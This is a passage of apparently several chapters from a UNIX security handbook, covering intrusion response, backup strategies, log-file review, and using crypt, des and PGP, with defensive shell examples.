console logs and printed copies of network logs), and to examine these logs to try to get an idea of what<br />

the unauthorized intruder has done. You will also want to see if anything unusual has happened on the<br />

system since the intruder logged in. These logs may give you a hint as to what programs the intruder was<br />

running and what actions the intruder took. Be sure to initial and timestamp these printouts.<br />

Do not confine your examination to today's logs. If the intruder is now logged in as root, he may have<br />

also been on the system under another account name earlier. If your logs go back for a few days, examine<br />

the older versions as well. If they are on your backup tapes, consider retrieving them from the tapes.<br />


If the break-in is something that you wish to pursue further - possibly with law enforcement - be sure to<br />

do a complete backup of the system to tape. This way, you'll have evidence in the form of the corrupted<br />

system. Also, save copies of the logs. Keep a written log of everything you've done and are about to do,<br />

and be sure to write the time of day along with each notation.<br />

The next step is to determine how the intruder got in and then to make sure the intruder can't get in again.<br />

Examine the entire system. Check the permissions and the modes on all your files. Scan for new SUID or<br />

SGID files. Look for additions in /etc/passwd. If you have constructed checklists of your program<br />

directories, rerun them to look for any changes.<br />
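
For example, the scan described above might look roughly like this; the directories and the format of your passwd file may differ, and a saved listing from before the incident makes the comparison far more useful.

# Find all SUID and SGID files on the system and list them.
find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -l {} \;

# Look for unexpected entries in /etc/passwd, especially extra UID 0 accounts.
awk -F: '$3 == 0 {print $0}' /etc/passwd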

Remember: the intruder may not be an outsider! The majority of major incidents occur from inside the<br />

organization, either from someone with current access or someone who recently had legitimate access.<br />

When you perform your evaluation, don't forget to consider the case that the behavior you saw coming<br />

from a user account was not someone breaking a password and coming in from outside, but was someone<br />

on the inside who broke the password, or perhaps it was the real account owner herself!<br />

Only after performing all these steps, and checking all this information, should you bring the system back<br />

up.<br />

24.5.1 Never Trust Anything Except Hardcopy<br />

If your system is compromised, don't trust anything that is online. If you discover changes in files on<br />

your system that seem suspicious, don't believe anything that your system tells you, because a good<br />

system cracker can change anything on the computer. This may seem extreme, but it is probably better to<br />

spend a little extra time restoring files and playing detective now than it would be to replay the entire<br />

incident when the intruder gets in again.<br />

Remember, an attacker who becomes the superuser on your computer can do anything to it - change any byte on the hard disk. The attacker can compile and install new versions of any system program, so there might be changes that your standard utilities will not tell you about. The attacker can patch the kernel that the computer is running, possibly disabling security features that you have previously enabled. The attacker can even open the raw disk devices for reading and writing. Essentially, attackers who become the superuser can warp your system to their liking - if they have sufficient skill, motivation, and time. Often, they don't need (or have) great skill. Instead, they have access to toolkits put together by others with more skill.

For example, suppose you discover a change in a file and do an ls -l or an ls -lt. The modification time<br />

you see printed for the file may not be the actual modification time of the file. There are at least four<br />

ways for an attacker to modify the time that is displayed by this command, all of which have been used<br />

in actual system attacks:<br />

● The attacker could write a program that changes the modification time of the file using the utimes() system call.

● The attacker could have altered the system clock by using the date command. The attacker could then modify your files and, finally, reset the date back again. This technique has the advantage for the attacker that the inode access and creation times also get set.

● The attacker could write to the raw disk, changing saved values of any stored time.

● The attacker could have modified the ls command to show a predetermined modification time whenever this file is examined.

The only limit to the powers of an attacker who has gained superuser status is that the attacker cannot<br />

change something that has been printed on a line printer or a hardcopy terminal. For this reason, if you<br />

have a logging facility that logs whenever the date is changed, you might consider having the log made<br />

to a hardcopy terminal or to another computer. Then, be sure to examine this log on a regular basis.<br />

We also recommend that you have a bootable copy of your operating system on a removable disk pack so that, when needed, you can boot from a known good copy of the system and examine the suspect system with uncorrupted tools. Coupled with a database of message digests of unmodified files, such as one produced by a tool like Tripwire, you should be able to find anything that was modified on your system.
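
The idea, in rough outline, looks like the following sketch. The directories, the name of the digest program (md5 on some systems, md5sum on others), and the baseline location are assumptions; Tripwire automates this process far more thoroughly.

# While the system is known to be clean, record a digest of every system file.
find /bin /usr/bin /etc -type f -exec md5 {} \; > /secure/baseline.md5

# Later, after booting from the known-good copy, recompute and compare.
find /bin /usr/bin /etc -type f -exec md5 {} \; > /tmp/current.md5
diff /secure/baseline.md5 /tmp/current.md5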


Chapter 7<br />

Backups<br />

7.2 Sample Backup Strategies<br />

A backup strategy describes how often you back up each of your computer's partitions, what kinds of<br />

backups you use, and for how long backups are kept. Backup strategies are based on many factors,<br />

including:<br />

● How much storage the site has

● The kind of backup system that is used

● The importance of the data

● The amount of time and money available for conducting backups

● Expected uses of the backup archive

In the following sections, we outline some typical backup strategies for several different situations.<br />

7.2.1 Individual Workstation<br />

Most users do not back up their workstations on a regular basis: they think that backing up their data is<br />

too much effort. Unfortunately, they don't consider the effort required to retype everything that they've<br />

ever done to recover their records.<br />

Here is a simple backup strategy for users with PCs or stand-alone workstations:<br />

7.2.1.1 Backup plan<br />

Full backups<br />

Once a month, or after a major software package is installed, back up the entire system. At the<br />

beginning of each year, make two complete backups and store them in different locations.<br />

Project-related backups<br />

Back up current projects and critical files with specially written Perl or shell scripts. For example,<br />

you might have a Perl script that backs up all of the files for a program you are writing, or all of<br />

the chapters of your next book. These files can be bundled and compressed into a single tar file,<br />

which can often then be stored on a floppy disk or saved over the network to another computer.<br />
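
A minimal shell sketch of such a project backup might look like this; the directory, archive, and host names are examples only.

#!/bin/sh
# Bundle and compress one project directory, then copy the archive to
# another machine (or write it to a floppy instead).
PROJECT=$HOME/book
ARCHIVE=/tmp/book-`date +%Y%m%d`.tar.Z

tar cf - $PROJECT | compress > $ARCHIVE
rcp $ARCHIVE backuphost:backups/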

Home-directory backups<br />


If your system is on a network, write a shell script that backs up your home directory to a remote<br />

machine. Set the script to automatically run once a day, or as often as is feasible. But beware: if<br />

you are not careful, you could easily overwrite your backup with a bad copy before you realize that<br />

something needs to be restored. Spending a few extra minutes to set things up properly (for<br />

example, by keeping three or four home-directory backups on different machines, each updated on<br />

a different day of the week) can save you a lot of time (and panic) later.<br />
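
One way to arrange this, keeping a separate copy for each day of the week so that a single bad run cannot destroy every backup, is sketched below; the host and path names are examples only.

#!/bin/sh
# Run once a day from cron: copy the home directory to a remote machine,
# naming the archive after the day of the week.
DAY=`date +%a`
tar cf - $HOME | compress | rsh backuphost "cat > backups/home-$DAY.tar.Z"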

This strategy never uses incremental backups; instead, complete backups of a particular set of files are<br />

always created. Such project-related backups tend to be incredibly comforting and occasionally valuable.<br />

Retention schedule<br />

Keep the monthly backups for two years. Keep the yearly backups forever.

7.2.1.2 Media rotation<br />

If you wish to perform incremental backups, you can improve their reliability by using media rotation. In<br />

implementing this strategy, you actually create two complete sets of backup tapes, A and B. At the<br />

beginning of your backup cycle, you perform two complete dumps, first to tape A, and then on the<br />

following day, to tape B. Each day you perform an incremental dump, alternating tapes A and B. In this<br />

way, each file is backed up in two locations. This scheme is shown graphically in Figure 7.2.<br />

Figure 7.2: Incremental backup with media rotation<br />
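
A script can choose the tape set for the day mechanically; the following sketch alternates sets A and B by day of the year (the dump level, device, and filesystem names are assumptions).

#!/bin/sh
# Prompt for the correct tape set, then perform the incremental dump.
DAY=`date +%j`                      # day of the year
if [ `expr $DAY % 2` -eq 0 ]
then
    echo "Mount tape set A, then press return"
else
    echo "Mount tape set B, then press return"
fi
read junk
dump 1uf /dev/rmt0 /users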

7.2.2 Small Network of Workstations and a Server<br />

Most small groups rely on a single server with up to a few dozen workstations. In our example, the organization has a single server with several disks, 15 workstations, and a DAT tape backup drive.

The organization doesn't have much money to spend on system administration, so it sets up a system for<br />


backing up the most important files over the network to a specially designed server.<br />

Server configuration
    Drive #1: /, /usr, /var (standard UNIX filesystems)
    Drive #2: /users (user files)
    Drive #3: /localapps (locally installed applications)

Client configuration
    Clients are run as "dataless workstations" and are not backed up. Most clients are equipped with a 360MB hard disk, although one client has a 1GB drive.

7.2.2.1 Backup plan<br />

Monthly backups<br />

Once a month, each drive is backed up onto its own tape with the <strong>UNIX</strong> dump utility. This is a full<br />

backup, also known as a level 0 dump.<br />
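
For example, a level 0 dump of one drive to the DAT drive might look roughly like this; the device and filesystem names are assumptions, and options vary among dump implementations.

# Full (level 0) dump of the /users drive, recording the date in
# /etc/dumpdates (the "u" flag).
dump 0uf /dev/rmt0 /users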

Weekly backups<br />

Once a week, an incremental backup on drive #1 and drive #3 is written to a DAT tape (Level 1<br />

dump). The entire /users filesystem is then added to the end of that tape (Level 0 dump).<br />

Daily backups<br />

A Level 1 dump on drive #2 is written to a file which is stored on the local hard disk of the client<br />

equipped with the 1GB hard drive. The backup is compressed as it is stored.<br />

Hourly backups<br />

Every hour, a special directory, /users/activeprojects, is archived in a tar file. This file is sent over<br />

the network to the client workstation with the 1GB drive. The last eight files are kept, giving<br />

immediate backups in the event that a user accidentally deletes or corrupts a file. The system<br />

checks the client to make sure that it has adequate space on the drive before beginning each hourly<br />

backup.<br />
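
As a rough illustration, the hourly job might be structured as follows; the host and path names are examples, and a production script would first check free space on the client (for example, with df) as described above.

#!/bin/sh
# Run hourly from cron on the server: archive the active projects and send
# the archive to the client with the large disk, reusing eight rotating
# slots so that the last eight hours remain available.
HOUR=`date +%H`
SLOT=`expr $HOUR % 8`
tar cf - /users/activeprojects | compress | \
    rsh bigclient "cat > /backups/active.$SLOT.tar.Z"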

The daily and hourly backups are done automatically via scripts run by the cron daemon. All monthly<br />

and weekly backups are done with shell scripts that are run manually. The scripts both perform the<br />

backup and then verify that the data on the tape can be read back, but the backups do not verify that the<br />

data on the tape is the same as that on the disk. (No easy verification method exists for the standard<br />

<strong>UNIX</strong> dump/restore programs.)<br />

Automated systems should be inspected on a routine basis to make sure they are still working as planned. You may want to have the script notify you when it completes, sending a list of any errors to a human (in addition to logging them in a file).

NOTE: If data confidentiality is very important, or if there is a significant risk of packet<br />

sniffing, you should design your backup scripts so that unencrypted backup data is never<br />

sent over the network.<br />

7.2.2.2 Retention schedule<br />

Monthly backups<br />


Kept for a full calendar year. Each quarterly backup is kept as a permanent archive for a few years.<br />

The year-end backups are kept forever.<br />

Weekly backups<br />

Kept on four tapes, which are recycled each month. These tapes should be thrown out every five<br />

years (60 uses), although the organization will probably have a new tape drive within five years<br />

that uses different kinds of tapes.<br />

Daily backups<br />

One day's backup is kept. Each day's backup overwrites the previous day's.<br />

7.2.3 Large Service-Based Network with Small Budgets<br />

Most large decentralized organizations, such as universities, operate networks with thousands of users<br />

and a high degree of autonomy between system operators. The primary goal of the backup system of<br />

these organizations is to minimize downtime in the event of hardware failure or network attack; if<br />

possible, the system can also restore user files deleted or damaged by accident.<br />

Server configuration
    Primary servers:
        Drive #1: /, /usr, /var (standard UNIX filesystems)
        Drives #2-5: user files
    Secondary server (matches each primary):
        Drive #1: /, /usr, /var (standard UNIX filesystems)
        Drives #2-6: Backup staging area

Client configuration
    Clients are run as "dataless workstations" and are not backed up. Most clients are equipped with a 500MB hard disk. The clients receive monthly software distributions from a trusted server, by CD-ROM or network. Each distribution includes all files and results in a reload of a fresh copy of the operating system. These distributions keep the systems up to date, discourage local storage by users, and reduce the impact (and lifetime) of Trojan horses and other unauthorized modifications of the operating system.

7.2.3.1 Backup plan<br />

Every night, each backup staging area drive is erased and then filled with the contents of the matching<br />

drive on its matching primary server. The following morning, the entire disk is copied to a high-speed<br />

8mm tape drive.<br />

Using special secondary servers dramatically eases the load of writing backup tapes. This strategy also<br />

provides a hot replacement system should the primary server fail.<br />
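
One common way to implement the nightly copy is to pipe dump into restore across the network; a rough sketch follows, with host, path, and filesystem names as assumptions.

#!/bin/sh
# Run nightly on a primary server: erase the matching staging area on the
# secondary server, then refill it from the /users drive.
rsh secondary "rm -rf /stage/users/*"
dump 0f - /users | rsh secondary "cd /stage/users && restore rf -"
# The next morning, the secondary server copies /stage/users to the 8mm tape drive.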

7.2.3.2 Retention schedule<br />

Backups are retained for two weeks. During that time, users can have their files restored to a special<br />

"restoration" area, perhaps for a small fee. Users who wish archival backups for longer than two weeks<br />


must arrange backups of their own. One of the reasons for this decision is privacy: users should have a<br />

reasonable expectation that if they delete their files, the backups will be erased at some point in the<br />

future.<br />

7.2.4 Large Service-Based Networks with Large Budgets<br />

Many banks and other large firms have requirements for minimum downtime in the event of a failure.<br />

Thus, current and complete backups that are ready to go at a moment's notice are vital. In this scheme,<br />

we do not use magnetic media at all. Instead, we use a network and special disks.<br />

Each of the local computers uses RAID (Redundant Arrays of Independent Disks) for local disk storage. Every write to disk is mirrored on another disk automatically, so the failure of one disk has no user-noticeable effects.

Meanwhile, the entire storage of the system is mirrored every night at 2 a.m. to a set of remote disks in<br />

another state (a hot site). This mirroring is done using a high-speed, encrypted leased network line. At the<br />

remote location, there is an exact duplicate of the main system. During the day, a running log of activities<br />

is kept and mirrored to the remote site as it is written locally.<br />

If a failure of the main system occurs, the remote system is activated. It replays the transaction log and<br />

duplicates the changes locally, and then takes over operation for the failed main site.<br />

Every morning, a CD-ROM is made of the disk contents of the backup system, so as not to slow actual<br />

operations. The contents are then copied, and the copies sent by bonded courier to different branch<br />

offices around the country, where they are saved for seven years. Data on old tapes will be migrated to<br />

new backup systems as the technology becomes available.<br />

7.2.5 Deciding upon a Backup Strategy<br />

The key to deciding upon a good strategy for backups is to understand the importance and<br />

time-sensitivity of your data. As a start, we suggest that answers to the following questions will help you<br />

plan your backups:<br />

● How quickly do you need to resume operations after a complete loss of the main system?

● How quickly do you need to resume operations after a partial loss?

● Can you perform restores while the system is "live"?

● Can you perform backups while the system is "live"?

● What data do you need restored first? Next? Last?

● Of the users you must listen to, who will complain the most if their data is not available?

● What will cause the biggest loss if it is not available?

● Who loses data most often from equipment or human failures?

● How many spare copies of the backups must you have to feel safe?

● How long do you need to keep each backup?

● How much are you willing or able to spend?


Chapter 10<br />

Auditing and Logging<br />

10.8 Managing Log Files<br />

There are several final suggestions we can make about log files. The first has to do with backups. We<br />

strongly recommend that you ensure that all of your log files are copied to your backup media on a<br />

regular basis, preferably daily. The timing of the backups should be such that any file that is periodically<br />

reset is copied to the backups before the reset is performed. This will ensure that you have a series of<br />

records over time to show system access and behavior.<br />
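
One simple way to arrange this is to copy each log to a dated archive file shortly before it is reset, so the nightly backup picks up the day's complete log; the log names and archive directory below are examples only.

#!/bin/sh
# Run from cron just before the logs are reset and before the nightly backup.
DATE=`date +%Y%m%d`
for LOG in /var/log/messages /var/adm/sulog
do
    cp $LOG /var/log/archive/`basename $LOG`.$DATE
done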

Our second suggestion concerns how often to review the log files. We recommend that you do this at<br />

least daily. Keeping log records does you little service if you do not review them on a regular basis. Log<br />

files can reveal problems with your hardware, with your network configuration, and (of course) with<br />

your security. Consequently, you must review the logs regularly to note when a problem is actually<br />

present. If you delay for too long, the problem may become more severe; if there has been an intruder, he<br />

or she may have the time to edit the log files, change your security mechanisms, and do dirty deeds<br />

before you take notice.<br />

Our third suggestion concerns how you process your log messages. Typically, log messages record<br />

nothing of particular interest. Thus, every time you review the logs (possibly daily, or several times a<br />

day, if you take our previous suggestion), you are faced with many lines of boring, familiar messages.<br />

The problem with this scenario is that you may become so accustomed to seeing this material that you<br />

get in the habit of making only a cursory scan of the messages to see if something is wrong, and this way<br />

you can easily miss an important message.<br />

To address this problem, our advice is to filter the messages that you actually look at, reducing them to a more manageable collection. Doing so requires some care, however. You do not want to write a filter that selects the important things you want to see and discards the rest: such a system is likely to result in an important message being discarded without ever being read. Instead, filter out the boring messages, being as specific as you can with your pattern matching, and pass everything else through to be read. Periodically, you should also study the unfiltered log messages to be sure that you are not missing anything of importance.
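
A minimal sketch of this approach follows: known-boring messages are removed, and everything the filter does not recognize is passed through to be read. The log file name and the patterns are examples only; tune them to the noise at your own site.

#!/bin/sh
# Mail the day's log, minus a few specific messages known to be uninteresting.
egrep -v 'lpd: .* out of paper|sendmail\[[0-9]*\]: .* stat=Sent' \
    /var/log/messages | mail -s "daily log review" postmaster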

Our last suggestion hints at our comments in Chapter 27, Who Do You Trust?

Don't trust your logs completely! Logs can often be altered or deleted by an intruder who obtains<br />

superuser privileges. Local users with physical access or appropriate knowledge of the system may be<br />

able to falsify or circumvent logging mechanisms. And, of course, software errors and system errors may<br />

result in logs not being properly collected and saved. Thus, you need to develop redundant scanning and logging mechanisms: the fact that something was not logged does not mean that it didn't happen.


Of course, simply because something was logged doesn't mean it did happen, either - someone may cause<br />

entries to be written to logs to throw you off the case of a real problem or point a false accusation at<br />

someone else. These deceptions are easy to create with syslog if you haven't protected the network port<br />

from messages originating outside your site!<br />



Chapter 6<br />

Cryptography<br />

6.6 Encryption Programs Available for <strong>UNIX</strong><br />

This section describes three encryption programs that are available today on many <strong>UNIX</strong> systems:<br />

crypt
The original UNIX encryption application.

des
An implementation of the Data Encryption Standard.

pgp
Phil Zimmermann's Pretty Good Privacy.

Each of these programs offers increasing amounts of security, but the more secure programs have more legal restrictions on their<br />

use in the United States.[24] Many other countries have passed legislation severely restricting or outlawing the use of strong<br />

cryptography by private citizens.<br />

[24] We don't mean to slight our readers in countries other than the U.S., but we are not familiar with all of the<br />

various national laws and regulations around the world. You should check your local laws to discover if there are<br />

restrictions on your use of these programs.<br />

6.6.1 <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

<strong>UNIX</strong> crypt is an encryption program that is included as a standard part of the <strong>UNIX</strong> operating system. It is a very simple<br />

encryption program that is easily broken, as evidenced by AT&T's uncharacteristic disclaimer on the man page:<br />

BUGS: There is no warranty of merchantability nor any warranty of fitness for a particular purpose nor any other<br />

warranty, either express or implied, as to the accuracy of the enclosed materials or as to their suitability for any<br />

particular purpose. Accordingly, Bell Telephone Laboratories assumes no responsibility for their use by the<br />

recipient. Further, Bell Laboratories assumes no obligation to furnish any assistance of any kind whatsoever, or to<br />

furnish any additional information or documentation.<br />

- crypt reference page<br />

Note that the crypt program is different from the more secure crypt() library call, which is described in Chapter 8, Defending<br />

Your Accounts.<br />

6.6.1.1 The crypt program<br />

The crypt program uses a simplified simulation of the Enigma encryption machine described in "The Enigma Encryption<br />

System" earlier in this chapter. Unlike Enigma, which had to encrypt only letters, crypt must be able to encrypt any block of<br />

8-bit data. As a result, the rotors used with crypt must have 256 "connectors" on each side. A second difference between Enigma<br />

and crypt is that, while Enigma used three or four rotors and a reflector, crypt uses only a single rotor and reflector. The<br />

encryption key provided by the user determines the placement of the virtual wires in the rotor and reflector.<br />

Partially because crypt has but a single rotor, files encrypted with crypt are exceedingly easy for a cryptographer to break. For<br />

several years, noncryptographers have been able to break messages encrypted with crypt as well, thanks to a program developed<br />

in 1986 by Robert Baldwin, then at the MIT Laboratory for Computer Science. Baldwin's program, Crypt Breaker's Workbench<br />


(CBW), decrypts text files encrypted with crypt within a matter of minutes, with minimal help from the user.<br />

CBW breaks crypt by searching for arrangements of "wires" within the "rotor" that cause a file encrypted with crypt to decrypt<br />

into plain ASCII text. The task is considerably simpler than it may sound at first, because normal ASCII text uses only 127 of the<br />

possible 256 different code combinations (the ASCII codes 0 and 128 through 255 do not appear in normal <strong>UNIX</strong> text). Thus,<br />

most arrangements of the "wires" produce invalid characters when the file is decrypted; CBW automatically discards these<br />

arrangements.<br />

CBW has been widely distributed; as a result, files encrypted with crypt should not be considered secure. (They weren't secure<br />

before CBW was distributed; fewer people simply had the technical skill necessary to break them.)<br />

6.6.1.2 Ways of improving the security of crypt<br />

We recommend that you do not use crypt to encrypt files more than 1K long. Nevertheless, you may have no other encryption<br />

system readily available to you. If this is the case, you are better off using crypt than nothing at all. You can also take a few<br />

simple precautions that will decrease the chances that your encrypted files will be decrypted:[25]<br />

[25] In particular, these precautions will defeat CBW's automatic crypt-breaking activities.

● Encrypt the file multiple times, using different keys at each stage. This essentially changes the transformation.

● Compress your files before encrypting them. Compressing a file alters the information - the plain ASCII text - that programs such as CBW use to determine when they have correctly assembled part of the encryption key. If your message does not decrypt into plain text, CBW will not determine when it has correctly decrypted your message. However, if your attackers know you have done this, they can modify their version of CBW accordingly.

● If you use compress or pack to compress your file, remove the 3-byte header. Files compressed with compress contain a 3-byte signature, or header, consisting of the hexadecimal values 1f, 9d, and 90 (in that order). If your attacker believes that your file was compressed before it was encrypted, knowing how the first three bytes decrypt can help him to decrypt the rest of the file. You can strip these three bytes with the dd command:[26]

[26] Using dd this way is very slow and inefficient. If you are going to be encrypting a lot of compressed files, you may wish to write a small program to remove the headers more efficiently.

% compress -c < plaintext | dd bs=3 skip=1 | crypt > encrypted

Of course, you must remember to replace the 3-byte header before you attempt to uncompress the file:

% (compress -cf /dev/null;crypt < encrypted) | uncompress -c > plaintext

If you do not have compress, use tar to bundle your file to be encrypted with other files containing random data; then encrypt the<br />

tar file. The presence of random data will make it more difficult for decryption programs such as CBW to isolate your plaintext.<br />

As encrypted files contain binary information, you must process them with uuencode if you wish to email them.<br />

6.6.1.3 Example<br />

To compress, encrypt, unencode, and send a file with electronic mail:<br />

% ls -l myfile<br />

-rw-r--r-- 1 fred 166328 Nov 16 15:25 myfile<br />

% compress myfile<br />

% ls -l myfile.Z<br />

-rw-r--r-- 1 fred 78535 Nov 16 15:25 myfile.Z<br />

% dd if=myfile.Z of=myfile.Z.strip bs=3 skip=1<br />

26177+1 records in<br />

26177+1 records out<br />

% crypt akey < myfile.Z.strip | uuencode afile | mail spook@nsa.gov<br />

To decrypt a file that you have received and saved in the file file:

% head -3 file<br />

begin 0600 afile<br />


M?Z/#V3V,IGO!](D!175:;S9_IU\A7K;:'LBB,8363R,T+/WZSOC4PQ,U/6Q<br />

MX,T8&XZDQ1+[4Y[*N4W@A3@9YM*4XV+U\)X9NT.7@Z+W"WY^9-?(JRU,-4%<br />

% uudecode file<br />

% ls -l afile<br />

-rw-r--r-- 1 fred 78532 Nov 16 15:32 afile<br />

% (compress -cf /dev/null;crypt < afile) | uncompress -c > myfile<br />

myfile now contains the original file.<br />

6.6.2 des: The Data Encryption Standard<br />

There are several software implementations of the Data Encryption Standard that are commonly available for <strong>UNIX</strong> computers.<br />

Several of the most popular implementations are based on the des code written by Phil Karn, a <strong>UNIX</strong> guru (and ham radio<br />

operator whose call sign is KA9Q). In the past, some <strong>UNIX</strong> vendors have included des commands as part of their operating<br />

system, although many of these implementations have been removed so that the companies can maintain a single version of their<br />

operating system for both export and domestic use.[27] Nevertheless, des software is widely available both inside and outside the<br />

United States.<br />

[27] For example, Sun Microsystems ships the easily broken crypt encryption program with Solaris, and sells a "US<br />

Encryption Kit" which contains the des program at a nominal cost.<br />

The des command is a filter that reads from standard input and writes to standard output. It usually accepts the following<br />

command-line options:<br />

% des -e|-d [-h] [-k key] [-b]<br />

When using the DES, encryption and decryption are not identical operations, but are inverses of each other. The option -e<br />

specifies that you are encrypting a file. For example:<br />

% des -e < message > message.des

Enter key: mykey<br />

Enter key again: mykey<br />

% cat message.des<br />

"UI}mE8NZlOi\Iy|<br />

(The Enter key: prompt is from the program; the key is not echoed.)<br />

Use the -d option to decrypt your file:<br />

% des -d < message.des<br />

Enter key: mykey<br />

Enter key again: mykey<br />

This is the secret message.<br />

You can use the -k option to specify the key on the command line. On most versions of <strong>UNIX</strong>, any user of the system can use the<br />

ps command to see what commands other users are running. Karn's version of des tries to mitigate the danger of the ps command<br />

by making a copy of its command line arguments and erasing the original. Nevertheless, this is a potential vulnerability, and<br />

should be used with caution.<br />

NOTE: You should never specify a key in a shell script: anybody who has access to read the script will be able to<br />

decode your files.<br />

A -b option to the command selects Electronic Code Book (ECB) mode. The default is Cipher Block Chaining (CBC). As<br />

described in "DES modes" earlier in this chapter, ECB mode encodes a block at a time, with identical input blocks encoding to<br />

identical output blocks. This encoding will reveal if there is a pattern to the input. However, it will also be able to decrypt most<br />

of the file even if parts of it are corrupted or deleted. CBC mode hides repeated patterns, and results in a file that cannot be<br />

decrypted after any point of change or deletion.<br />

If you use the -h option, des will allow you to specify a key in hexadecimal. Such keys should be randomly generated. If you do<br />

not specify a key in hexadecimal, then your key will most likely be restricted to characters that you can type on your keyboard.<br />

Many people further restrict their keys to words or phrases that they can remember (see the sidebar entitled "Number of<br />

Passwords" in Chapter 3, Users and Passwords). Unfortunately, this method makes it dramatically easier for an attacker to<br />


decrypt a DES-encrypted file by doing a key search. To see why, consider the following table:<br />

Table 6.3: Key Search Comparisons

Key Choice                Algorithm Keyspace    Number of Possible Keys
Random DES key            128^8 = 2^56          7.2 x 10^16
Typeable characters[28]   127^8                 6.8 x 10^16
Printable characters      96^8                  7.2 x 10^15
Two words                 1,000,000^2           10^12
One word                  1,000,000             10^6

[28] You can't enter null as a character in your key.

Some versions of des will encrypt a file if it is specified on the command line. Input and output filenames are optional. If only<br />

one filename is given, it is assumed to be the input file.<br />

Some versions of <strong>UNIX</strong> designed for export include a des command that doesn't do anything. Instead of encrypting your file, it<br />

simply prints an error message explaining that the software version of des is not available.<br />

6.6.3 PGP: Pretty Good Privacy<br />

In 1991, Phil Zimmermann wrote a program called PGP which performs both private key and public key cryptography. That<br />

program was subsequently released on the <strong>Internet</strong> and improved by numerous programmers, mostly outside of the United<br />

States.[29] In 1994, Zimmermann turned the distribution of PGP over to the Massachusetts Institute of Technology, which<br />

makes the software available for anonymous FTP from the computer net-dist.mit.edu.<br />

[29] Get the whole story! Although this section presents a good introduction to PGP, the program is far too<br />

complicated to describe here. For a full description of PGP, we recommend the book PGP: Pretty Good Privacy by<br />

Simson Garfinkel (<strong>O'Reilly</strong> & Associates, 1995).<br />

The version of PGP that is distributed from MIT uses the RSA Data <strong>Sec</strong>urity software package RSAREF. This software is only<br />

available for noncommercial use. If you wish to use PGP for commercial purposes, you should purchase it from ViaCrypt<br />

International (whose address is listed in Appendix D).<br />

PGP Version 2 uses IDEA as its private key encryption algorithm and RSA for its public key encryption. (Later versions of PGP<br />

may allow a multiplicity of encryption algorithms to be used, such as Triple DES.) PGP can also seal and verify digital<br />

signatures, and includes sophisticated key-management software. It also has provisions for storing public and private keys in<br />

special files called key rings (illustrated in Figure 6.5). Finally, PGP has provisions for certifying keys, again using digital<br />

signatures.<br />

Figure 6.5: PGP key rings<br />

6.6.3.1 Encrypting files with IDEA<br />


You can use PGP to encrypt a file with the IDEA encryption cipher with the following command line:<br />

% pgp -c message<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:32 GMT<br />

You need a pass phrase to encrypt the file.<br />

Enter pass phrase:some days green tomatoes<br />

Enter same pass phrase again: some days green tomatoes<br />

Just a moment....<br />

Ciphertext file: message.pgp<br />

%<br />

Rather than using your pass phrase directly as the cryptographic key, PGP calculates the MD5 hash of the pass phrase and uses that hash as the key. This means that you can use a pass phrase of any length. Because IDEA uses a 128-bit key, key-search attacks are not feasible.

PGP automatically compresses everything that it encrypts, which is fortunate, because after a file is encrypted, it cannot be<br />

compressed further: the output will appear random, and file compression requires some repeated patterns to compress.<br />

If you want to decrypt your file, run PGP with the encrypted file as its sole argument:<br />

% pgp message.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:47 GMT<br />

File is conventionally encrypted.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: some days green tomatoes<br />

Just a moment....Pass phrase appears good. .<br />

Plaintext filename: message<br />

%<br />

If you do not type the correct pass phrase, PGP will not decrypt your file:<br />

% pgp message.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:48 GMT<br />

File is conventionally encrypted.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: I am the walrus<br />

Just a moment...<br />

Error: Bad pass phrase.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: Love will find a way<br />

Just a moment...<br />

Error: Bad pass phrase.<br />

For a usage summary, type: pgp -h<br />


For more detailed help, consult the PGP User's Guide.<br />

%<br />

6.6.3.2 Creating your PGP public key<br />

The real power of PGP is not the encryption of files, but the encryption of electronic mail messages. PGP uses public key<br />

cryptography, which allows anybody to create a message and encrypt it using your public key. After the message is encrypted,<br />

no one can decrypt it unless someone has your secret key. (Ideally, nobody other than you should have a copy of your key.) PGP<br />

also allows you to electronically "sign" a document with a digital signature, which other people can verify.<br />

To make use of these features, you will first need to create a public key for yourself and distribute it among your correspondents.<br />

Do this with PGP's -kg option:<br />

% pgp -kg<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:01 GMT<br />

Pick your RSA key size:<br />

1) 512 bits- Low commercial grade, fast but less secure<br />

2) 768 bits- High commercial grade, medium speed, good security<br />

3) 1024 bits- "Military" grade, slow, highest security<br />

Choose 1, 2, or 3, or enter desired number of bits: 3<br />

Generating an RSA key with a 1024-bit modulus.<br />

You need a user ID for your public key. The desired form for this
user ID is your name, followed by your E-mail address enclosed in
<angle brackets>, if you have an E-mail address.
For example: John Q. Smith <12345.6789@compuserve.com>

Enter a user ID for your public key:
Michelle Love <love@michelle.org>

You need a pass phrase to protect your RSA secret key.<br />

Your pass phrase can be any sentence or phrase and may have many<br />

words, spaces, punctuation, or any other printable characters.<br />

Enter pass phrase: every thought burns into substance

Enter same pass phrase again: every thought burns into substance

Note that key generation is a lengthy process.<br />

We need to generate 720 random bits. This is done by measuring the<br />

time intervals between your keystrokes. Please enter some random text<br />

on your keyboard until you hear the beep:<br />

Here you type a lot of random data that nobody else really sees. It doesn't
matter what you type, as long as you don't simply hold down one key. 0 * -Enough, thank you.

